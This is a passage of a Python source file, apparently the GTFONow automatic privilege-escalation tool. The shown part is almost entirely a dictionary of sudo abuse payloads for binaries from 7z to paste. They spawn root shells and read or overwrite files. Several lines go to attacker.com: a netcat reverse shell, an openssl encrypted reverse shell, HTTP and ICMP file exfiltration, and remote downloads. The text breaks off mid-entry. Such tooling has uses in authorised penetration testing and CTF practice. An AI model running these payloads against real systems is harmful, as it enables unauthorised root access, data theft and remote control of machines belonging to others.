#! /usr/bin/env/python # -*- coding: utf-8 -*- # https://github.com/Frissi0n/GTFONow # Automatic privilege escalation for misconfiguRED capabilities, sudo and suid binaries. from __future__ import print_function import subprocess import getpass import os import argparse import sys import re import stat import grp import pwd import logging import platform import time import select # SUDO_BINS_START sudo_bins = { "7z": [ { "code": "LFILE=file_to_read\nsudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so\n" } ], "aa-exec": [ { "code": "sudo aa-exec /bin/sh" } ], "ab": [ { "code": "URL=http://attacker.com/\nLFILE=file_to_send\nsudo ab -p $LFILE $URL\n", "description": "Upload local file via HTTP POST request." } ], "alpine": [ { "code": "LFILE=file_to_read\nsudo alpine -F \"$LFILE\"\n" } ], "ansible-playbook": [ { "code": "TF=$(mktemp)\necho '[{hosts: localhost, tasks: [shell: /bin/sh /dev/tty 2>/dev/tty]}]' >$TF\nsudo ansible-playbook $TF\n" } ], "ansible-test": [ { "code": "sudo ansible-test shell" } ], "aoss": [ { "code": "sudo aoss /bin/sh" } ], "apache2ctl": [ { "code": "LFILE=file_to_read\nsudo apache2ctl -c \"Include $LFILE\" -k stop\n" } ], "apt": [ { "code": "sudo apt changelog apt\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." }, { "code": "TF=$(mktemp)\necho 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' > $TF\nsudo apt install -c $TF sl\n", "description": "For this to work the target package (e.g., `sl`) must not be installed." }, { "code": "sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh", "description": "When the shell exits the `update` command is actually executed." } ], "apt-get": [ { "code": "sudo apt-get changelog apt\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." }, { "code": "TF=$(mktemp)\necho 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' > $TF\nsudo apt-get install -c $TF sl\n", "description": "For this to work the target package (e.g., `sl`) must not be installed." }, { "code": "sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh", "description": "When the shell exits the `update` command is actually executed." } ], "ar": [ { "code": "TF=$(mktemp -u)\nLFILE=file_to_read\nsudo ar r \"$TF\" \"$LFILE\"\ncat \"$TF\"\n" } ], "aria2c": [ { "code": "COMMAND='id'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\nsudo aria2c --on-download-error=$TF http://x\n" } ], "arj": [ { "code": "TF=$(mktemp -d)\nLFILE=file_to_write\nLDIR=where_to_write\necho DATA >\"$TF/$LFILE\"\narj a \"$TF/a\" \"$TF/$LFILE\"\nsudo arj e \"$TF/a\" $LDIR\n", "description": "The archive can also be prepared offline then uploaded." } ], "arp": [ { "code": "LFILE=file_to_read\nsudo arp -v -f \"$LFILE\"\n" } ], "as": [ { "code": "LFILE=file_to_read\nsudo as @$LFILE\n" } ], "ascii-xfr": [ { "code": "LFILE=file_to_read\nsudo ascii-xfr -ns \"$LFILE\"\n" } ], "ascii85": [ { "code": "LFILE=file_to_read\nsudo ascii85 \"$LFILE\" | ascii85 --decode\n" } ], "ash": [ { "code": "sudo ash" } ], "aspell": [ { "code": "LFILE=file_to_read\nsudo aspell -c \"$LFILE\"\n" } ], "at": [ { "code": "echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | sudo at now; tail -f /dev/null\n" } ], "atobm": [ { "code": "LFILE=file_to_read\nsudo atobm $LFILE 2>&1 | awk -F \"'\" '{printf \"%s\", $2}'\n" } ], "awk": [ { "code": "sudo awk 'BEGIN {system(\"/bin/sh\")}'" } ], "aws": [ { "code": "sudo aws help\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "base32": [ { "code": "LFILE=file_to_read\nsudo base32 \"$LFILE\" | base32 --decode\n" } ], "base58": [ { "code": "LFILE=file_to_read\nsudo base58 \"$LFILE\" | base58 --decode\n" } ], "base64": [ { "code": "LFILE=file_to_read\nsudo base64 \"$LFILE\" | base64 --decode\n" } ], "basenc": [ { "code": "LFILE=file_to_read\nsudo basenc --base64 $LFILE | basenc -d --base64\n" } ], "basez": [ { "code": "LFILE=file_to_read\nsudo basez \"$LFILE\" | basez --decode\n" } ], "bash": [ { "code": "sudo bash" } ], "batcat": [ { "code": "sudo batcat --paging always /etc/profile\n!/bin/sh\n" } ], "bc": [ { "code": "LFILE=file_to_read\nsudo bc -s $LFILE\nquit\n" } ], "bconsole": [ { "code": "sudo bconsole\n@exec /bin/sh\n" } ], "bpftrace": [ { "code": "sudo bpftrace -e 'BEGIN {system(\"/bin/sh\");exit()}'" }, { "code": "TF=$(mktemp)\necho 'BEGIN {system(\"/bin/sh\");exit()}' >$TF\nsudo bpftrace $TF\n" }, { "code": "sudo bpftrace -c /bin/sh -e 'END {exit()}'" } ], "bridge": [ { "code": "LFILE=file_to_read\nsudo bridge -b \"$LFILE\"\n" } ], "bundle": [ { "code": "sudo bundle help\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "bundler": [ { "code": "sudo bundler help\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "busctl": [ { "code": "sudo busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'\n" } ], "busybox": [ { "code": "sudo busybox sh" } ], "byebug": [ { "code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\nsudo byebug $TF\ncontinue\n" } ], "bzip2": [ { "code": "LFILE=file_to_read\nsudo bzip2 -c $LFILE | bzip2 -d\n" } ], "c89": [ { "code": "sudo c89 -wrapper /bin/sh,-s ." } ], "c99": [ { "code": "sudo c99 -wrapper /bin/sh,-s ." } ], "cabal": [ { "code": "sudo cabal exec -- /bin/sh" } ], "capsh": [ { "code": "sudo capsh --" } ], "cat": [ { "code": "LFILE=file_to_read\nsudo cat \"$LFILE\"\n" } ], "cdist": [ { "code": "sudo cdist shell -s /bin/sh" } ], "certbot": [ { "code": "TF=$(mktemp -d)\nsudo certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir $TF --work-dir $TF --config-dir $TF --pre-hook '/bin/sh 1>&0 2>&0'\n" } ], "check_by_ssh": [ { "code": "sudo check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C xx", "description": "The shell will only last 10 seconds." } ], "check_cups": [ { "code": "LFILE=file_to_read\nsudo check_cups --extra-opts=@$LFILE\n" } ], "check_log": [ { "code": "LFILE=file_to_write\nINPUT=input_file\nsudo check_log -F $INPUT -O $LFILE\n" } ], "check_memory": [ { "code": "LFILE=file_to_read\nsudo check_memory --extra-opts=@$LFILE\n" } ], "check_raid": [ { "code": "LFILE=file_to_read\nsudo check_raid --extra-opts=@$LFILE\n" } ], "check_ssl_cert": [ { "code": "COMMAND=id\nOUTPUT=output_file\nTF=$(mktemp)\necho \"$COMMAND | tee $OUTPUT\" > $TF\nchmod +x $TF\numask 022\ncheck_ssl_cert --curl-bin $TF -H example.net\ncat $OUTPUT\n", "description": "The host example.net must return a certificate via TLS" } ], "check_statusfile": [ { "code": "LFILE=file_to_read\nsudo check_statusfile $LFILE\n" } ], "chmod": [ { "code": "LFILE=file_to_change\nsudo chmod 6777 $LFILE\n" } ], "choom": [ { "code": "sudo choom -n 0 /bin/sh" } ], "chown": [ { "code": "LFILE=file_to_change\nsudo chown $(id -un):$(id -gn) $LFILE\n" } ], "chroot": [ { "code": "sudo chroot /\n" } ], "clamscan": [ { "code": "LFILE=file_to_read\nTF=$(mktemp -d)\ntouch $TF/empty.yara\nsudo clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'\n" } ], "cmp": [ { "code": "LFILE=file_to_read\nsudo cmp $LFILE /dev/zero -b -l\n" } ], "cobc": [ { "code": "TF=$(mktemp -d)\necho 'CALL \"SYSTEM\" USING \"/bin/sh\".' > $TF/x\nsudo cobc -xFj --frelax-syntax-checks $TF/x\n" } ], "column": [ { "code": "LFILE=file_to_read\nsudo column $LFILE\n" } ], "comm": [ { "code": "LFILE=file_to_read\nsudo comm $LFILE /dev/null 2>/dev/null\n" } ], "composer": [ { "code": "TF=$(mktemp -d)\necho '{\"scripts\":{\"x\":\"/bin/sh -i 0<&3 1>&3 2>&3\"}}' >$TF/composer.json\nsudo composer --working-dir=$TF run-script x\n" } ], "cowsay": [ { "code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\nsudo cowsay -f $TF x\n" } ], "cowthink": [ { "code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\nsudo cowthink -f $TF x\n" } ], "cp": [ { "code": "LFILE=file_to_write\necho \"DATA\" | sudo cp /dev/stdin \"$LFILE\"\n" }, { "code": "LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nsudo cp $TF $LFILE\n", "description": "This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)" }, { "code": "sudo cp /bin/sh /bin/cp\nsudo cp\n", "description": "This overrides `cp` itself with a shell (or any other executable) that is to be executed as root, useful in case a `sudo` rule allows to only run `cp` by path. Warning, this is a destructive action." } ], "cpan": [ { "code": "sudo cpan\n! exec '/bin/bash'\n" } ], "cpio": [ { "code": "echo '/bin/sh /dev/tty' >localhost\nsudo cpio -o --rsh-command /bin/sh -F localhost:\n" }, { "code": "LFILE=file_to_read\nTF=$(mktemp -d)\necho \"$LFILE\" | sudo cpio -R $UID -dp $TF\ncat \"$TF/$LFILE\"\n", "description": "The whole directory structure is copied to `$TF`." }, { "code": "LFILE=file_to_write\nLDIR=where_to_write\necho DATA >$LFILE\necho $LFILE | sudo cpio -R 0:0 -p $LDIR\n", "description": "Copies `$LFILE` to the `$LDIR` directory." } ], "cpulimit": [ { "code": "sudo cpulimit -l 100 -f /bin/sh" } ], "crash": [ { "code": "sudo crash -h\n!sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "crontab": [ { "code": "sudo crontab -e", "description": "The commands are executed according to the crontab file edited via the `crontab` utility." } ], "csh": [ { "code": "sudo csh" } ], "csplit": [ { "code": "LFILE=file_to_read\ncsplit $LFILE 1\ncat xx01\n" } ], "csvtool": [ { "code": "sudo csvtool call '/bin/sh;false' /etc/passwd" } ], "cupsfilter": [ { "code": "LFILE=file_to_read\nsudo cupsfilter -i application/octet-stream -m application/octet-stream $LFILE\n" } ], "curl": [ { "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nsudo curl $URL -o $LFILE\n", "description": "Fetch a remote file via HTTP GET request." } ], "cut": [ { "code": "LFILE=file_to_read\nsudo cut -d \"\" -f1 \"$LFILE\"\n" } ], "dash": [ { "code": "sudo dash" } ], "date": [ { "code": "LFILE=file_to_read\nsudo date -f $LFILE\n" } ], "dc": [ { "code": "sudo dc -e '!/bin/sh'" } ], "dd": [ { "code": "LFILE=file_to_write\necho \"data\" | sudo dd of=$LFILE\n" } ], "debugfs": [ { "code": "sudo debugfs\n!/bin/sh\n" } ], "dialog": [ { "code": "LFILE=file_to_read\nsudo dialog --textbox \"$LFILE\" 0 0\n" } ], "diff": [ { "code": "LFILE=file_to_read\nsudo diff --line-format=%L /dev/null $LFILE\n" } ], "dig": [ { "code": "LFILE=file_to_read\nsudo dig -f $LFILE\n" } ], "distcc": [ { "code": "sudo distcc /bin/sh" } ], "dmesg": [ { "code": "sudo dmesg -H\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "dmidecode": [ { "code": "LFILE=file_to_write\nsudo dmidecode --no-sysfs -d x.dmi --dump-bin \"$LFILE\"\n", "description": "It can be used to overwrite files using a specially crafted SMBIOS file that can be read as a memory device by dmidecode.\nGenerate the file with [dmiwrite](https://github.com/adamreiser/dmiwrite) and upload it to the target.\n\n- `--dump-bin`, will cause dmidecode to write the payload to the destination specified, prepended with 32 null bytes.\n\n- `--no-sysfs`, if the target system is using an older version of dmidecode, you may need to omit the option.\n\n```\nmake dmiwrite\nTF=$(mktemp)\necho \"DATA\" > $TF\n./dmiwrite $TF x.dmi\n```\n" } ], "dmsetup": [ { "code": "sudo dmsetup create base < $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```\n" } ], "docker": [ { "code": "sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh", "description": "The resulting is a root shell." } ], "dosbox": [ { "code": "LFILE='\\path\\to\\file_to_write'\nsudo dosbox -c 'mount c /' -c \"echo DATA >c:$LFILE\" -c exit\n", "description": "Note that the name of the written file in the following example will be `FILE_TO_`. Also note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write." } ], "dotnet": [ { "code": "sudo dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;\n" } ], "dpkg": [ { "code": "sudo dpkg -l\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." }, { "code": "sudo dpkg -i x_1.0_all.deb", "description": "It runs an interactive shell using a specially crafted Debian package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'exec /bin/sh' > $TF/x.sh\nfpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF\n```\n" } ], "dstat": [ { "code": "echo 'import os; os.execv(\"/bin/sh\", [\"sh\"])' >/usr/local/share/dstat/dstat_xxx.py\nsudo dstat --xxx\n" } ], "dvips": [ { "code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\nsudo dvips -R0 texput.dvi\n" } ], "easy_install": [ { "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo easy_install $TF\n" } ], "eb": [ { "code": "sudo eb logs\n!/bin/sh\n" } ], "ed": [ { "code": "sudo ed\n!/bin/sh\n" } ], "efax": [ { "code": "LFILE=file_to_read\nsudo efax -d \"$LFILE\"\n" } ], "elvish": [ { "code": "sudo elvish" } ], "emacs": [ { "code": "sudo emacs -Q -nw --eval '(term \"/bin/sh\")'" } ], "enscript": [ { "code": "sudo enscript /dev/null -qo /dev/null -I '/bin/sh >&2'" } ], "env": [ { "code": "sudo env /bin/sh" } ], "eqn": [ { "code": "LFILE=file_to_read\nsudo eqn \"$LFILE\"\n" } ], "espeak": [ { "code": "LFILE=file_to_read\nsudo espeak -qXf \"$LFILE\"\n" } ], "ex": [ { "code": "sudo ex\n!/bin/sh\n" } ], "exiftool": [ { "code": "LFILE=file_to_write\nINPUT=input_file\nsudo exiftool -filename=$LFILE $INPUT\n" } ], "expand": [ { "code": "LFILE=file_to_read\nsudo expand \"$LFILE\"\n" } ], "expect": [ { "code": "sudo expect -c 'spawn /bin/sh;interact'" } ], "facter": [ { "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nsudo FACTERLIB=$TF facter\n" } ], "file": [ { "code": "LFILE=file_to_read\nsudo file -f $LFILE\n", "description": "Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation, so this may not be suitable for binary files." } ], "find": [ { "code": "sudo find . -exec /bin/sh \\; -quit" } ], "fish": [ { "code": "sudo fish" } ], "flock": [ { "code": "sudo flock -u / /bin/sh" } ], "fmt": [ { "code": "LFILE=file_to_read\nsudo fmt -999 \"$LFILE\"\n", "description": "This corrupts the output by wrapping very long lines at the given width." } ], "fold": [ { "code": "LFILE=file_to_read\nsudo fold -w99999999 \"$LFILE\"\n" } ], "fping": [ { "code": "LFILE=file_to_read\nsudo fping -f $LFILE\n" } ], "ftp": [ { "code": "sudo ftp\n!/bin/sh\n" } ], "gawk": [ { "code": "sudo gawk 'BEGIN {system(\"/bin/sh\")}'" } ], "gcc": [ { "code": "sudo gcc -wrapper /bin/sh,-s ." } ], "gcloud": [ { "code": "sudo gcloud help\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "gcore": [ { "code": "sudo gcore $PID" } ], "gdb": [ { "code": "sudo gdb -nx -ex '!sh' -ex quit" } ], "gem": [ { "code": "sudo gem open -e \"/bin/sh -c /bin/sh\" rdoc", "description": "This requires the name of an installed gem to be provided (`rdoc` is usually installed)." } ], "genie": [ { "code": "sudo genie -c '/bin/sh'" } ], "genisoimage": [ { "code": "LFILE=file_to_read\nsudo genisoimage -q -o - \"$LFILE\"\n" } ], "ghc": [ { "code": "sudo ghc -e 'System.Process.callCommand \"/bin/sh\"'" } ], "ghci": [ { "code": "sudo ghci\nSystem.Process.callCommand \"/bin/sh\"\n" } ], "gimp": [ { "code": "sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'" } ], "ginsh": [ { "code": "sudo ginsh\n!/bin/sh\n" } ], "git": [ { "code": "sudo PAGER='sh -c \"exec sh 0<&1\"' git -p help" }, { "code": "sudo git -p help config\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." }, { "code": "sudo git branch --help config\n!/bin/sh\n", "description": "The help system can also be reached from any `git` command, e.g., `git branch`. This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." }, { "code": "TF=$(mktemp -d)\ngit init \"$TF\"\necho 'exec /bin/sh 0<&2 1>&2' >\"$TF/.git/hooks/pre-commit.sample\"\nmv \"$TF/.git/hooks/pre-commit.sample\" \"$TF/.git/hooks/pre-commit\"\nsudo git -C \"$TF\" commit --allow-empty -m x\n", "description": "Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option." }, { "code": "TF=$(mktemp -d)\nln -s /bin/sh \"$TF/git-x\"\nsudo git \"--exec-path=$TF\" x\n" } ], "grc": [ { "code": "sudo grc --pty /bin/sh" } ], "grep": [ { "code": "LFILE=file_to_read\nsudo grep '' $LFILE\n" } ], "gtester": [ { "code": "TF=$(mktemp)\necho '#!/bin/sh' > $TF\necho 'exec /bin/sh 0<&1' >> $TF\nchmod +x $TF\nsudo gtester -q $TF\n" } ], "gzip": [ { "code": "LFILE=file_to_read\nsudo gzip -f $LFILE -t\n" } ], "hd": [ { "code": "LFILE=file_to_read\nsudo hd \"$LFILE\"\n" } ], "head": [ { "code": "LFILE=file_to_read\nsudo head -c1G \"$LFILE\"\n" } ], "hexdump": [ { "code": "LFILE=file_to_read\nsudo hexdump -C \"$LFILE\"\n" } ], "highlight": [ { "code": "LFILE=file_to_read\nsudo highlight --no-doc --failsafe \"$LFILE\"\n" } ], "hping3": [ { "code": "sudo hping3\n/bin/sh\n" }, { "code": "RHOST=attacker.com\nLFILE=file_to_read\nsudo hping3 \"$RHOST\" --icmp --data 500 --sign xxx --file \"$LFILE\"\n", "description": "The file is continuously sent, adjust the `--count` parameter or kill the sender when done. Receive on the attacker box with:\n\n```\nsudo hping3 --icmp --listen xxx --dump\n```\n" } ], "iconv": [ { "code": "LFILE=file_to_read\n./iconv -f 8859_1 -t 8859_1 \"$LFILE\"\n" } ], "iftop": [ { "code": "sudo iftop\n!/bin/sh\n" } ], "install": [ { "code": "LFILE=file_to_change\nTF=$(mktemp)\nsudo install -m 6777 $LFILE $TF\n" } ], "ionice": [ { "code": "sudo ionice /bin/sh" } ], "ip": [ { "code": "LFILE=file_to_read\nsudo ip -force -batch \"$LFILE\"\n" }, { "code": "sudo ip netns add foo\nsudo ip netns exec foo /bin/sh\nsudo ip netns delete foo\n", "description": "This only works for Linux with CONFIG_NET_NS=y." }, { "code": "sudo ip netns add foo\nsudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar\nsudo ip netns exec bar /bin/sh\nsudo ip netns delete foo\nsudo ip netns delete bar\n", "description": "This only works for Linux with CONFIG_NET_NS=y. This version also grants network access." } ], "irb": [ { "code": "sudo irb\nexec '/bin/bash'\n" } ], "ispell": [ { "code": "sudo ispell /etc/passwd\n!/bin/sh\n" } ], "jjs": [ { "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()\" | sudo jjs" } ], "joe": [ { "code": "sudo joe\n^K!/bin/sh\n" } ], "join": [ { "code": "LFILE=file_to_read\nsudo join -a 2 /dev/null $LFILE\n" } ], "journalctl": [ { "code": "sudo journalctl\n!/bin/sh\n" } ], "jq": [ { "code": "LFILE=file_to_read\nsudo jq -Rr . \"$LFILE\"\n" } ], "jrunscript": [ { "code": "sudo jrunscript -e \"exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')\"" } ], "jtag": [ { "code": "sudo jtag --interactive\nshell /bin/sh\n" } ], "julia": [ { "code": "sudo julia -e 'run(`/bin/sh`)'\n" } ], "knife": [ { "code": "sudo knife exec -E 'exec \"/bin/sh\"'\n" } ], "ksh": [ { "code": "sudo ksh" } ], "ksshell": [ { "code": "LFILE=file_to_read\nsudo ksshell -i $LFILE\n" } ], "ksu": [ { "code": "sudo ksu -q -e /bin/sh" } ], "kubectl": [ { "code": "LFILE=dir_to_serve\nsudo kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/\n" } ], "latex": [ { "code": "sudo latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{file_to_read}\\end{document}'\nstrings article.dvi\n", "description": "The read file will be part of the output." }, { "code": "sudo latex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n" } ], "latexmk": [ { "code": "sudo latexmk -e 'exec \"/bin/sh\";'" } ], "ld.so": [ { "code": "sudo /lib/ld.so /bin/sh" } ], "ldconfig": [ { "code": "TF=$(mktemp -d)\necho \"$TF\" > \"$TF/conf\"\n# move malicious libraries in $TF\nsudo ldconfig -f \"$TF/conf\"\n", "description": "This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries." } ], "less": [ { "code": "sudo less /etc/profile\n!/bin/sh\n" } ], "lftp": [ { "code": "sudo lftp -c '!/bin/sh'" } ], "ln": [ { "code": "sudo ln -fs /bin/sh /bin/ln\nsudo ln\n" } ], "loginctl": [ { "code": "sudo loginctl user-status\n!/bin/sh\n" } ], "logsave": [ { "code": "sudo logsave /dev/null /bin/sh -i" } ], "look": [ { "code": "LFILE=file_to_read\nsudo look '' \"$LFILE\"\n" } ], "ltrace": [ { "code": "sudo ltrace -b -L /bin/sh" } ], "lua": [ { "code": "sudo lua -e 'os.execute(\"/bin/sh\")'" } ], "lualatex": [ { "code": "sudo lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'" } ], "luatex": [ { "code": "sudo luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'" } ], "lwp-download": [ { "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nsudo lwp-download $URL $LFILE\n" } ], "lwp-request": [ { "code": "LFILE=file_to_read\nsudo lwp-request \"file://$LFILE\"\n" } ], "mail": [ { "code": "sudo mail --exec='!/bin/sh'", "description": "GNU version only." } ], "make": [ { "code": "COMMAND='/bin/sh'\nsudo make -s --eval=$'x:\\n\\t-'\"$COMMAND\"\n" } ], "man": [ { "code": "sudo man man\n!/bin/sh\n" } ], "mawk": [ { "code": "sudo mawk 'BEGIN {system(\"/bin/sh\")}'" } ], "minicom": [ { "code": "sudo minicom -D /dev/null\n", "description": "Start the following command to open the TUI interface, then:\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\nAfter the shell, exit with `Ctrl-A x`.\n" } ], "more": [ { "code": "TERM= sudo more /etc/profile\n!/bin/sh\n" } ], "mosquitto": [ { "code": "LFILE=file_to_read\nsudo mosquitto -c \"$LFILE\"\n" } ], "mount": [ { "code": "sudo mount -o bind /bin/sh /bin/mount\nsudo mount\n", "description": "Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell." } ], "msfconsole": [ { "code": "sudo msfconsole\nmsf6 > irb\n>> system(\"/bin/sh\")\n" } ], "msgattrib": [ { "code": "LFILE=file_to_read\nsudo msgattrib -P $LFILE\n" } ], "msgcat": [ { "code": "LFILE=file_to_read\nsudo msgcat -P $LFILE\n" } ], "msgconv": [ { "code": "LFILE=file_to_read\nsudo msgconv -P $LFILE\n" } ], "msgfilter": [ { "code": "echo x | sudo msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'\n", "description": "Any text file will do as the input (use `-i`). `kill` is needed to spawn the shell only once." } ], "msgmerge": [ { "code": "LFILE=file_to_read\nsudo msgmerge -P $LFILE /dev/null\n" } ], "msguniq": [ { "code": "LFILE=file_to_read\nsudo msguniq -P $LFILE\n" } ], "mtr": [ { "code": "LFILE=file_to_read\nsudo mtr --raw -F \"$LFILE\"\n" } ], "multitime": [ { "code": "sudo multitime /bin/sh" } ], "mv": [ { "code": "LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nsudo mv $TF $LFILE\n" } ], "mysql": [ { "code": "sudo mysql -e '\\! /bin/sh'" } ], "nano": [ { "code": "sudo nano\n^R^X\nreset; sh 1>&0 2>&0\n" } ], "nasm": [ { "code": "LFILE=file_to_read\nsudo nasm -@ $LFILE\n" } ], "nawk": [ { "code": "sudo nawk 'BEGIN {system(\"/bin/sh\")}'" } ], "nc": [ { "code": "RHOST=attacker.com\nRPORT=12345\nsudo nc -e /bin/sh $RHOST $RPORT\n", "description": "Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional." } ], "ncdu": [ { "code": "sudo ncdu\nb\n" } ], "ncftp": [ { "code": "sudo ncftp\n!/bin/sh\n" } ], "neofetch": [ { "code": "TF=$(mktemp)\necho 'exec /bin/sh' >$TF\nsudo neofetch --config $TF\n" } ], "nft": [ { "code": "LFILE=file_to_read\nsudo nft -f \"$LFILE\"\n" } ], "nice": [ { "code": "sudo nice /bin/sh" } ], "nl": [ { "code": "LFILE=file_to_read\nsudo nl -bn -w1 -s '' $LFILE\n" } ], "nm": [ { "code": "LFILE=file_to_read\nsudo nm @$LFILE\n" } ], "nmap": [ { "code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' > $TF\nsudo nmap --script=$TF\n", "description": "Input echo is disabled." }, { "code": "sudo nmap --interactive\nnmap> !sh\n", "description": "The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands." } ], "node": [ { "code": "sudo node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n" } ], "nohup": [ { "code": "sudo nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\"" } ], "npm": [ { "code": "TF=$(mktemp -d)\necho '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' > $TF/package.json\nsudo npm -C $TF --unsafe-perm i\n", "description": "Additionally, arbitrary script names can be used in place of `preinstall` and triggered by name with, e.g., `npm -C $TF run preinstall`." } ], "nroff": [ { "code": "TF=$(mktemp -d)\necho '#!/bin/sh' > $TF/groff\necho '/bin/sh' >> $TF/groff\nchmod +x $TF/groff\nsudo GROFF_BIN_PATH=$TF nroff\n" } ], "nsenter": [ { "code": "sudo nsenter /bin/sh" } ], "ntpdate": [ { "code": "LFILE=file_to_read\nsudo ntpdate -a x -k $LFILE -d localhost\n" } ], "octave": [ { "code": "sudo octave-cli --eval 'system(\"/bin/sh\")'" } ], "od": [ { "code": "LFILE=file_to_read\nsudo od -An -c -w9999 \"$LFILE\"\n" } ], "openssl": [ { "code": "RHOST=attacker.com\nRPORT=12345\nmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s\n", "description": "To receive the shell run the following on the attacker box:\n\n openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n openssl s_server -quiet -key key.pem -cert cert.pem -port 12345\n\nCommunication between attacker and target will be encrypted.\n" } ], "openvpn": [ { "code": "sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'\n" }, { "code": "LFILE=file_to_read\nsudo openvpn --config \"$LFILE\"\n", "description": "The file is actually parsed and the first partial wrong line is returned in an error message." } ], "openvt": [ { "code": "COMMAND=id\nTF=$(mktemp -u)\nsudo openvt -- sh -c \"$COMMAND >$TF 2>&1\"\ncat $TF\n", "description": "The command execution is blind (displayed on the virtual console), but it is possible to save the output on a temporary file." } ], "opkg": [ { "code": "sudo opkg install x_1.0_all.deb\n", "description": "It runs an interactive shell using a specially crafted Debian package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'exec /bin/sh' > $TF/x.sh\nfpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF\n```\n" } ], "pandoc": [ { "code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' >$TF\nsudo pandoc -L $TF /dev/null\n", "description": "Pandoc has a builtin [`lua`](/gtfobins/lua/) interpreter for writing filters, other functions might apply." } ], "paste": [ { "code": "LFILE=file_to_read\nsudo paste 